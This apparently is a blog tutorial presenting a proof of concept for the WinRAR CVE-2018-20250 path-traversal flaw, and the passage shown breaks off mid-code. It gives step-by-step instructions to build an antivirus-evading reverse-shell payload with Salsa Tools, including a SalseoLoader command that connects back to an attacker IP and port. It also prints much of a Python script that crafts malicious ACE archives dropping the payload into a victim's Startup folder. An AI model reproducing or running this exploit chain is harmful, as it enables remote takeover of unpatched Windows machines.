· Manuel López Pérez · tutoriales · 3 min read
Remote Code Execution WinRAR (CVE-2018-20250) POC
Proof of Concept (PoC) for the WinRAR CVE-2018-20250 vulnerability, allowing remote code execution by extracting malicious files to arbitrary directories. Step-by-step guide to create a malicious ACE file that executes a payload on system startup.
Hi, today I bring you the “proof of concept” of a vulnerability that was found a few days ago in WinRar. This vulnerability has been running for 19 years and has been patched in version 5.70 beta 1, so if you are a WinRar user it is very important that you update the software.
Basically, this vulnerability will allow us to extract malicious files in an arbitrary directory. The vulnerability is described in detail in research.checkpoint.com, so we’ll just show you how to exploit it. Our target will be the startup diretory (even though you can choose the one you want) because out malicius file will be executed once the victim restarts the computer. I have chosen to use Salsa Tools from @CyberVaca_ as the malicious binary because with it we will get reverse shell (with some extra features such as bypass the AMSI) and the anti-virus won’t detect it.
Phases:
- Create the malicious binary.
- Create the ACE file.
- Wait for the victim to reboot the computer
Creating the binary
As I said before, we’re going to use the Salsa-tools: First we have to compile the EvilSalsa.dll library (open it with Visual Studio and click on compile) and encrypt it with the EncrypterAssembly:
python encrypterassembly.py EvilSalsa.dll PASSWORD evil.txt Now let’s compile the SalseoLoader (I have modified it pass the parameters from a text file called args.txt): 
I decided to host the evil.txt (obtained after encrypting EvilSalsa.dll) via SMBServer but there are other options.
SalseoLoader.exe PASSWORD evil.txt ReverseTcp IP PORT
Creating the ACE file - 1st Method
Using this script we’ll be able to create a malicious ACE file: https://github.com/manulqwerty/Evil-WinRAR-Gen [python] #!/usr/bin/env python3 import acefile import argparse import binascii import struct import os
class color: PURPLE = ‘\033[95m’ CYAN = ‘\033[96m’ DARKCYAN = ‘\033[36m’ BLUE = ‘\033[94m’ GREEN = ‘\033[92m’ YELLOW = ‘\033[93m’ RED = ‘\033[91m’ BOLD = ‘\033[1m’ UNDERLINE = ‘\033[4m’ END = ‘\033[0m’ def getArgs(): parser = argparse.ArgumentParser(description=‘Evil WinRAR Archive Generator (CVE-2018-20250) - Target: WinRAR < 5.70 beta 1\nBy @manulqwerty - ironhackers.es’) parser.add_argument(‘-o’,dest=‘filename’,type=str,help=‘Output filename - Default: evil.rar’,default=‘evil.rar’) parser.add_argument(‘-e’,metavar=‘evil_file’,nargs=’+’, dest=‘evil’,type=str,help=‘Evil files’,required=True) parser.add_argument(‘-g’,metavar=‘good_file’,nargs=’+’, dest=‘good’,type=str,help=‘Good files’,required=False) parser.add_argument(‘-p’,dest=‘path’,type=str,help=‘Path to uncompress the evil files - Default: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe’,default=‘C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\’) return parser.parse_args() def printHeader(): print(color.BOLD + color.GREEN + ''' _ _ __ ___ ___ _ ___ _____ _(_) | \ \ / (_)_ _ | _ \ /_\ | _ \\ / -_) V / | | \ \/\/ /| | ’ \| / / _ \| / \___|\_/|_|_| \_/\_/ |_|_||_|_|_\/_/ \_\_|_\\''' + color.END + color.RED + '''\n\n by @manulqwerty\n\n''' + color.BLUE + color.BOLD + '''----------------------------------------------------------------------\n''' + color.END) def writeShellcode(shellcode,filename): with open(filename , ‘wb+’) as f: f.write(binascii.unhexlify(shellcode)) def addShellcode(shellcode,filename): with open(filename , ‘ab+’) as f: f.write(binascii.unhexlify(shellcode)) def readShellcode(filename): with open (filename , ‘rb’) as f: return binascii.hexlify(f.read()).decode(‘utf-8’).upper() def hex2raw(hex_value,N): hex_value = hex_value.zfill(N) return ”.join([hex_value[x-1:x+1] for x in range(len(hex_value)-1,0,-2)]).ljust(N,‘0’) def buildShellcode(filename , path=”): if path == ”: path = filename hdr_crc_raw = ‘6789’ hdr_size_raw = hex(len(path)+31)[2:] hdr_size_raw = hex2raw(hdr_size_raw,4) packsize_raw = hex(os.path.getsize(filename))[2:] packsize_raw = hex2raw(packsize_raw,8) origsize_raw = packsize_raw with open(filename,‘rb’) as f: crc32_raw = hex(acefile.ace_crc32(f.read()))[2:] crc32_raw = hex2raw(crc32_raw,8) filename_len_raw = hex(len(path))[2:] filename_len_raw = hex2raw(filename_len_raw,4) filename_raw = "".join(”{:x}“.format(ord(c)) for c in path) shellcode = hdr_crc_raw + hdr_size_raw + “010180” + packsize_raw \ + origsize_raw + “63B0554E20000000” + crc32_raw + “00030A005445”\ + filename_len_raw + filename_raw + “01020304050607080910A1A2A3A4A5A6A7A8A9” return shellcode def str2bytes(str_input): return binascii.a2b_hex(str_input.upper()) def calCRC(shellcode): buf = str2bytes(shellcode)
